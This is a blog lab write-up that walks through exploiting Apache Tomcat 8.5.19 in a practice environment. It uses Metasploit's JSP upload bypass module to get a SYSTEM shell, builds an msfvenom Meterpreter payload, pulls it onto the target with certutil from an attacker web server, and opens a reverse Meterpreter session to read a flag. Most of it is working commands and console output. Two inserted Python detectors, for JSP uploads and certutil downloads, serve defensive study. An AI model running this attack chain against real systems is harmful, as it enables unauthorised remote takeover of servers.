Exploiting A Vulnerable Apache Tomcat Web Server

Posted by r3kind1e on January 31, 2023


Exploiting Apache Tomcat

Apache Tomcat, also known as Tomcat server, is a popular, free and open source Java servlet web server.

It is used to build and host dynamic websites and web applications based on the Java software platform.

Apache Tomcat utilizes the HTTP protocol to facilitate the underlying communication between the server and clients.

Apache Tomcat runs on TCP port 8080 by default.

The standard Apache HTTP web server is used to host static and dynamic websites or web applications, typically developed in PHP.

The Apache Tomcat web server is primarily used to host dynamic websites or web applications developed in Java.

Apache Tomcat V8.5.19 is vulnerable to a remote code execution vulnerability that could potentially allow an attacker to upload and execute a JSP payload in order to gain remote access to the target server.

We can utilize a prebuilt MSF exploit module to exploit this vulnerability and consequently gain access to the target server.


Demo: Exploiting A Vulnerable Apache Tomcat Web Server

JSP: JavaServer Pages

Target IP Address: 10.2.20.126

Kali Linux: 10.10.5.4

Ensure that we can interact with the Metasploit Framework database and consequently create workspaces and store data within those workspaces.

service postgresql start
msfconsole

Create a workspace.

workspace -a tomcat

Set our global variable for the RHOSTS value. This will save us time whenever we’re loading any modules, as the RHOSTS value will be set globally for any modules that we load.

setg RHOSTS 10.2.20.126

Check our workspaces.

workspace

The first step will involve port scanning and enumeration, because we need to identify whether Apache Tomcat is running on the target system.

db_nmap command will perform an Nmap scan within the Metasploit Framework console, and consequently store the Nmap results into the Metasploit Framework database within our current workspace.

-sS: Perform a SYN scan.

-sV: Perform service detection.

-O: Perform the operating system detection.

db_nmap -sS -sV -O 10.2.20.126

From the results we can see that the target system is running Windows, and that port 8080 is serving Apache Tomcat 8.5.19, which is vulnerable to a remote code execution vulnerability.

We can list the services that the Nmap scan just stored in the database by typing in the services command.

Search for the exploit module that we can use to exploit this specific version of Apache Tomcat.

search type:exploit tomcat_jsp
use exploit/multi/http/tomcat_jsp_upload_bypass
show options

If we open up our browser, we can confirm that we have Tomcat running.

http://10.2.20.126:8080

One piece of information is still missing: the payload we can use to obtain a reverse shell or a Meterpreter session.

Tomcat RCE via JSP Upload Bypass


This module uses a PUT request bypass to upload a jsp shell to a vulnerable Apache Tomcat configuration.


info

“This module uploads a jsp payload and executes it.”

It will upload a JSP file, which is a JavaServer Pages payload, which means we cannot use a Meterpreter payload out of the box; instead we have to use a Java JSP shell payload, which we can specify.
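As an added defender-side example (not part of the original post or of the Metasploit module), the following Python script parses Tomcat access log lines in the common format and flags PUT/DELETE requests aimed at a JSP resource, correlating each accepted upload with a later GET for the same page from the same client. The log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)
WRITE_METHODS = {"PUT", "DELETE"}


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def jsp_name(raw_path):
    """Percent-decode the request path, drop any query string, and return the
    lower-cased name up to and including '.jsp', or None if no '.jsp' appears.
    Matching on the decoded substring catches encoded or decorated variants
    of the name rather than only a clean '.jsp' suffix."""
    path = unquote(raw_path.split("?", 1)[0]).lower()
    idx = path.find(".jsp")
    return path[: idx + 4] if idx != -1 else None


def find_jsp_writes(lines):
    """Flag PUT/DELETE requests aimed at a JSP resource and record whether the
    same client later fetched (and therefore likely executed) the page."""
    entries = [e for e in map(parse_line, lines) if e]
    findings = []
    for i, e in enumerate(entries):
        if e["method"] not in WRITE_METHODS:
            continue
        name = jsp_name(e["path"])
        if name is None:
            continue
        accepted = e["status"].startswith("2")
        fetched_later = any(
            later["src"] == e["src"] and later["method"] == "GET"
            and jsp_name(later["path"]) == name
            for later in entries[i + 1:]
        )
        findings.append({"src": e["src"], "method": e["method"], "jsp": name,
                         "status": int(e["status"]), "accepted": accepted,
                         "executed": accepted and fetched_later})
    return findings


# Constructed sample lines: the second and third mimic an upload followed by
# a request for the uploaded page; the last is a rejected DELETE attempt.
SAMPLE_LOG = """\
10.10.16.2 - - [31/Jan/2023:08:58:40 +0530] "GET /index.jsp HTTP/1.1" 200 11286
10.10.16.2 - - [31/Jan/2023:08:59:05 +0530] "PUT /XkqQmC%2Ejsp HTTP/1.1" 201 -
10.10.16.2 - - [31/Jan/2023:08:59:07 +0530] "GET /XkqQmC.jsp HTTP/1.1" 200 -
10.0.25.5 - - [31/Jan/2023:09:10:01 +0530] "PUT /notes.txt HTTP/1.1" 405 -
10.0.25.5 - - [31/Jan/2023:09:11:12 +0530] "DELETE /old.jsp HTTP/1.1" 404 -
"""

if __name__ == "__main__":
    for finding in find_jsp_writes(SAMPLE_LOG.splitlines()):
        print(finding)
```

In a real deployment the same rule belongs in the log pipeline that already ingests the access logs; any accepted write to a JSP path on a server that should never accept PUT is worth an alert on its own.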

This is a nonstaged payload.

set payload java/jsp_shell_bind_tcp

And we’re going to be taking a look at how to get a Meterpreter session once we’ve gained access.

show options

Payload options (java/jsp_shell_bind_tcp)

LPORT: The port of the target system that we want to listen on for the remote connection. (Because it’s a bind shell.)

RHOST: The target address.

SHELL: Allow us to specify the system shell to use.

Given that the target system is running Windows, we set the shell to cmd, the Windows command interpreter.

set SHELL cmd
run

If that doesn’t work, we can terminate the execution and run it again, as this particular exploit module will take a few tries in order for it to work.

We now have a command prompt session on the target system, not a Meterpreter session, but we can still run Windows commands.

C:\Program Files\Apache Software Foundation\Tomcat 8.5>dir

Get our current privileges.

C:\Program Files\Apache Software Foundation\Tomcat 8.5>whoami

We have nt authority\system privileges, which means we have the highest privileges available on a Windows system.

However, this is not a convenient way of accessing the target. We typically want to obtain a Meterpreter session because of all the functionality that Meterpreter provides.

Because this is a command shell session, we can put it in the background using the Ctrl+Z keys on your keyboard.

If we list our sessions, the payload type is shown as java/linux, which means that even if we try to upgrade this shell into a Meterpreter session with the built-in post-exploitation module, it will not work.

sessions

What can we do here? This is where the technique covered in the client-side exploitation section comes in handy: generating payloads with msfvenom.

Generate a Windows Meterpreter payload with msfvenom, upload it to the target through our command shell session, and execute it on the target system. We should then receive a Meterpreter session on our handler, so we'll also have to set up a handler.

In order to do this, we want to keep this msfconsole session open, so we open a new tab in the terminal.

Target IP Address: 10.2.20.126

Kali Linux: 10.10.5.4

pwd

-p: Specify the payload.

-f: the output format.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.5.4 LPORT=1234 -f exe > meterpreter.exe

We need to transfer this meterpreter.exe payload onto the target system.

How can we do this? One technique is to set up a web server on the Kali Linux system to host the file and then download it on the target with a built-in Windows utility, because we don't have a Meterpreter session yet; that is what we're trying to establish.

Set up a simple web server within our current working directory to host the meterpreter.exe payload.

sudo python -m SimpleHTTPServer 80

Head back to our first tab, where we have access to the target via the command shell, and interact with the session.

sessions 1

In order to download this particular meterpreter.exe payload from the Kali Linux web server that we have set up, we’re going to utilize an in-built Windows utility called certutil, which can allow us, in this case, to download files from remote systems.

Certutil

-URLCache
CertUtil [Options] -URLCache [URL | CRL | * [delete]]

Display or delete URL cache entries

URL: cached URL

CRL: operate on all cached CRL URLs only

*: operate on all cached URLs

delete: delete relevant URLs from the current user's local cache

Use -f to force fetching a specific URL and updating the cache.

[-f] [-split]

-f: force fetching the URL and updating the cache (see the help text above), so the file is actually downloaded rather than served from the cache.

C:\Program Files\Apache Software Foundation\Tomcat 8.5>certutil -urlcache -f http://10.10.5.4/meterpreter.exe meterpreter.exe
C:\Program Files\Apache Software Foundation\Tomcat 8.5>dir
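As an added example that is not from the original post, this Python snippet shows the detection side of the certutil download step: it scans Sysmon-style process-creation records (constructed here) for certutil invoked with the -urlcache switch plus a URL, and rates the finding higher when it ran as SYSTEM or from a web server's install directory. The WEB_ROOT_HINTS list and the event field names are assumptions for the example.

```python
import ntpath
import re

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Working-directory fragments that suggest the command was issued from a web
# server process (such as a web shell). These hints are an assumption for
# this example, not a Sysmon or Tomcat setting.
WEB_ROOT_HINTS = ("apache software foundation\\tomcat", "\\inetpub\\")


def certutil_download(event):
    """Return a finding when a process-creation event shows certutil being
    used to fetch a URL (the -urlcache / /urlcache switch plus a URL),
    otherwise None. Switch spelling is case-insensitive and both '-' and
    '/' prefixes are accepted, as certutil itself accepts them."""
    if ntpath.basename(event["Image"]).lower() != "certutil.exe":
        return None
    cmd = event["CommandLine"]
    switches = {t.lstrip("-/").lower() for t in cmd.split() if t[:1] in ("-", "/")}
    urls = URL_RE.findall(cmd)
    if "urlcache" not in switches or not urls:
        return None
    cwd = event.get("CurrentDirectory", "").lower()
    user = event.get("User", "").lower()
    from_web_root = any(hint in cwd for hint in WEB_ROOT_HINTS)
    # A download run as SYSTEM or from inside a web server's install tree is
    # far more suspicious than one from an interactive user's profile.
    severity = "high" if from_web_root or user.endswith("\\system") else "medium"
    return {"user": event.get("User"), "url": urls[0],
            "cwd": event.get("CurrentDirectory"), "severity": severity}


def scan(events):
    """Run certutil_download over a list of events, keeping only findings."""
    return [f for f in map(certutil_download, events) if f]


# Constructed Sysmon Event ID 1 style records (only the fields used here).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://10.10.16.2/meterpreter.exe meterpreter.exe",
     "CurrentDirectory": r"C:\Program Files\Apache Software Foundation\Tomcat 8.5",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache * delete",  # cache housekeeping, no URL
     "CurrentDirectory": r"C:\Users\alice", "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\Users\alice\setup.exe SHA256",  # benign use
     "CurrentDirectory": r"C:\Users\alice", "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil /urlcache /f https://updates.example.invalid/agent.msi agent.msi",
     "CurrentDirectory": r"C:\Users\alice\Downloads", "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd",
     "CurrentDirectory": r"C:\Program Files\Apache Software Foundation\Tomcat 8.5",
     "User": r"NT AUTHORITY\SYSTEM"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```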

Set up our handler to receive the connection once we execute our meterpreter payload on the target system.

In order to do this, we can create a Metasploit RC script.

vim handler.rc
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.5.4
set LPORT 1234
run
:wq

-r: Load the resource script.

msfconsole -r handler.rc

That’s going to set up our listener automatically.

We can now execute the meterpreter.exe payload on the target system.

C:\Program Files\Apache Software Foundation\Tomcat 8.5>.\meterpreter.exe

It’s executed successfully.

We get a Meterpreter session opened on the target system.

getuid: get user id.

The permissions we have available are NT AUTHORITY\SYSTEM, which are the highest level of privileges.

meterpreter > sysinfo
meterpreter > getuid

And we’ve been able to obtain a Meterpreter session by utilizing an exploit module that did not allow us to specify a Meterpreter payload.

That’s how to use the techniques we’ve learned so far for generating payloads with msfvenom, plus a new one: transferring files from a Linux system onto a Windows system with the certutil utility. We gained access to the target by exploiting the Apache Tomcat web server, then used our knowledge of payload generation to create a Meterpreter payload, transfer it to the target, set up a handler, and execute the payload through our command shell session in order to receive a Meterpreter session, which is much better than a plain command shell.

Windows: Java Web Server

Overview

A Kali GUI machine and a target machine running a vulnerable java web server are provided to you. The IP address of the target machine is provided in a text file named target placed on the Desktop of the Kali machine (/root/Desktop/target).

Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module.

Objective: Exploit the application and retrieve the flag!

Instructions:

  • Your Kali machine has an interface with IP address 10.10.X.Y. Run “ip addr” to know the values of X and Y.
  • The IP address of the target machine is mentioned in the file “/root/Desktop/target”
  • Do not attack the gateway located at IP address 192.V.W.1 and 10.10.X.1

Solutions

The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1948.pdf

My own approach

Target IP Address : 10.0.25.99
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.16.2  netmask 255.255.255.0  broadcast 10.10.16.255
        ether 02:42:0a:0a:10:02  txqueuelen 0  (Ethernet)
root@attackdefense:~# service postgresql start
Starting PostgreSQL 12 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > workspace -a tomcat
[*] Added workspace: tomcat
[*] Workspace: tomcat
msf5 > setg RHOSTS 10.0.25.99
RHOSTS => 10.0.25.99
msf5 > workspace
  default
* tomcat
msf5 > db_nmap -sS -sV -O 10.0.25.99
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-01-31 08:47 IST
[*] Nmap: Nmap scan report for 10.0.25.99
[*] Nmap: Host is up (0.0026s latency).
[*] Nmap: Not shown: 990 closed ports
[*] Nmap: PORT      STATE SERVICE            VERSION
[*] Nmap: 135/tcp   open  msrpc              Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp  open  ssl/ms-wbt-server?
[*] Nmap: 8009/tcp  open  ajp13              Apache Jserv (Protocol v1.3)
[*] Nmap: 8080/tcp  open  http               Apache Tomcat 8.5.19
[*] Nmap: 49152/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49155/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=1/31%OT=135%CT=1%CU=42098%PV=Y%DS=3%DC=I%G=Y%TM=63D888
[*] Nmap: OS:8F%P=x86_64-pc-linux-gnu)SEQ(SP=F7%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%TS=
[*] Nmap: OS:7)OPS(O1=M546NW8ST11%O2=M546NW8ST11%O3=M546NW8NNT11%O4=M546NW8ST11%O5=M5
[*] Nmap: OS:46NW8ST11%O6=M546ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
[*] Nmap: OS:0)ECN(R=Y%DF=Y%T=7F%W=2000%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%A=S
[*] Nmap: OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
[*] Nmap: OS:T=7F%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%RD=
[*] Nmap: OS:0%Q=)T5(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W=0%
[*] Nmap: OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
[*] Nmap: OS:R=Y%DF=N%T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
[*] Nmap: OS:N%T=7F%CD=Z)
[*] Nmap: Network Distance: 3 hops
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 86.85 seconds
msf5 > services
Services
========

host        port   proto  name               state  info
----        ----   -----  ----               -----  ----
10.0.25.99  135    tcp    msrpc              open   Microsoft Windows RPC
10.0.25.99  139    tcp    netbios-ssn        open   Microsoft Windows netbios-ssn
10.0.25.99  445    tcp    microsoft-ds       open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.0.25.99  3389   tcp    ssl/ms-wbt-server  open   
10.0.25.99  8009   tcp    ajp13              open   Apache Jserv Protocol v1.3
10.0.25.99  8080   tcp    http               open   Apache Tomcat 8.5.19
10.0.25.99  49152  tcp    msrpc              open   Microsoft Windows RPC
10.0.25.99  49153  tcp    msrpc              open   Microsoft Windows RPC
10.0.25.99  49154  tcp    msrpc              open   Microsoft Windows RPC
10.0.25.99  49155  tcp    msrpc              open   Microsoft Windows RPC
msf5 > search type:exploit tomcat_jsp

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/multi/http/tomcat_jsp_upload_bypass  2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass


msf5 > use exploit/multi/http/tomcat_jsp_upload_bypass
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > show options

Module options (exploit/multi/http/tomcat_jsp_upload_bypass):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.0.25.99       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path of the Tomcat installation
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > info

       Name: Tomcat RCE via JSP Upload Bypass
     Module: exploit/multi/http/tomcat_jsp_upload_bypass
   Platform: Linux, Windows
       Arch: 
 Privileged: No

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Java Windows
  2   Java Linux

Payload information:

Description:
  This module uploads a jsp payload and executes it.
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > set payload java/jsp_shell_bind_tcp
payload => java/jsp_shell_bind_tcp
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > show options

Module options (exploit/multi/http/tomcat_jsp_upload_bypass):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.0.25.99       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path of the Tomcat installation
   VHOST                       no        HTTP server virtual host


Payload options (java/jsp_shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  10.0.25.99       no        The target address
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > set SHELL cmd
SHELL => cmd
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > run

[*] Uploading payload...
[-] Exploit aborted due to failure: payload-failed: Failed to execute the payload
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > run

[*] Uploading payload...
[*] Payload executed!
[*] Started bind TCP handler against 10.0.25.99:4444
[*] Command shell session 1 opened (10.10.16.2:36173 -> 10.0.25.99:4444) at 2023-01-31 08:59:28 +0530

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Program Files\Apache Software Foundation\Tomcat 8.5>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AEDF-99BD

 Directory of C:\Program Files\Apache Software Foundation\Tomcat 8.5

09/16/2020  06:00 AM    <DIR>          .
09/16/2020  06:00 AM    <DIR>          ..
09/16/2020  06:00 AM    <DIR>          bin
09/16/2020  06:02 AM    <DIR>          conf
09/16/2020  06:00 AM    <DIR>          lib
07/24/2017  09:01 PM            58,153 LICENSE
01/31/2023  03:10 AM    <DIR>          logs
07/24/2017  09:01 PM             1,774 NOTICE
07/24/2017  09:01 PM             7,241 RELEASE-NOTES
09/16/2020  06:00 AM    <DIR>          temp
07/24/2017  09:01 PM            21,630 tomcat.ico
07/24/2017  09:01 PM            73,624 Uninstall.exe
09/16/2020  06:00 AM    <DIR>          webapps
09/16/2020  06:00 AM    <DIR>          work
               5 File(s)        162,422 bytes
               9 Dir(s)   8,762,023,936 bytes free
C:\Program Files\Apache Software Foundation\Tomcat 8.5>whoami
whoami
nt authority\system
C:\Program Files\Apache Software Foundation\Tomcat 8.5>^Z
Background session 1? [y/N]  y
msf5 exploit(multi/http/tomcat_jsp_upload_bypass) > sessions

Active sessions
===============

  Id  Name  Type              Information  Connection
  --  ----  ----              -----------  ----------
  1         shell java/linux               10.10.16.2:36173 -> 10.0.25.99:4444 (10.0.25.99)
root@attackdefense:~# pwd
/root
root@attackdefense:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=1234 -f exe > meterpreter.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
root@attackdefense:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

C:\Program Files\Apache Software Foundation\Tomcat 8.5>certutil -urlcache -f http://10.10.16.2/meterpreter.exe meterpreter.exe
certutil -urlcache -f http://10.10.16.2/meterpreter.exe meterpreter.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
C:\Program Files\Apache Software Foundation\Tomcat 8.5>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AEDF-99BD

 Directory of C:\Program Files\Apache Software Foundation\Tomcat 8.5

01/31/2023  03:48 AM    <DIR>          .
01/31/2023  03:48 AM    <DIR>          ..
09/16/2020  06:00 AM    <DIR>          bin
09/16/2020  06:02 AM    <DIR>          conf
09/16/2020  06:00 AM    <DIR>          lib
07/24/2017  09:01 PM            58,153 LICENSE
01/31/2023  03:10 AM    <DIR>          logs
01/31/2023  03:48 AM            73,802 meterpreter.exe
07/24/2017  09:01 PM             1,774 NOTICE
07/24/2017  09:01 PM             7,241 RELEASE-NOTES
09/16/2020  06:00 AM    <DIR>          temp
07/24/2017  09:01 PM            21,630 tomcat.ico
07/24/2017  09:01 PM            73,624 Uninstall.exe
09/16/2020  06:00 AM    <DIR>          webapps
09/16/2020  06:00 AM    <DIR>          work
               6 File(s)        236,224 bytes
               9 Dir(s)   8,856,035,328 bytes free
root@attackdefense:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.25.99 - - [31/Jan/2023 09:17:59] "GET /meterpreter.exe HTTP/1.1" 200 -
10.0.25.99 - - [31/Jan/2023 09:18:00] "GET /meterpreter.exe HTTP/1.1" 200 -
root@attackdefense:~# vim handler.rc
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.16.2
set LPORT 1234
run
root@attackdefense:~# msfconsole -q -r handler.rc 
[*] Processing handler.rc for ERB directives.
resource (handler.rc)> use multi/handler
resource (handler.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (handler.rc)> set LHOST 10.10.16.2
LHOST => 10.10.16.2
resource (handler.rc)> set LPORT 1234
LPORT => 1234
resource (handler.rc)> run
[*] Started reverse TCP handler on 10.10.16.2:1234
C:\Program Files\Apache Software Foundation\Tomcat 8.5>.\meterpreter.exe
.\meterpreter.exe
resource (handler.rc)> run
[*] Started reverse TCP handler on 10.10.16.2:1234 
[*] Sending stage (180291 bytes) to 10.0.25.99
[*] Meterpreter session 1 opened (10.10.16.2:1234 -> 10.0.25.99:49367) at 2023-01-31 09:26:12 +0530

meterpreter > sysinfo
Computer        : WIN-OMCNBKR66MN
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > search -f flag.txt
Found 1 result...
    c:\flag.txt (32 bytes)
meterpreter > cat c:\\flag.txt
92d60a06d0ea2179c9a8c442c0bd0bc0